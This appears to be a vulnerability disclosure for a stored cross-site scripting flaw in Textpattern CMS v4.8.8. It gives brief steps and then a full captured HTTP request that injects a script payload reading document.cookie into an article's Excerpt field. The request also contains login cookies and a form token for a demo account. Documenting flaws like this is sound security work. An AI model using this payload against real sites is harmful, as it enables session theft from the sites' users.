Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/


--- Description ---


1) Login admin page , choose Content , Articles section : 
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write in Excerpt field this payload  > "><script>alert(document.cookie)</script>
3) Click My Site will you see alert button 
https://release-demo.textpattern.co/index.php?id=2


--- Request ---

POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"

2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"

article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"

edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"

"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"

1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"

1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"

4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"

articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"

article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"

2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"

06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"

13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"

19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"

35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"

25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"

alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"

Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"

async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"

fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--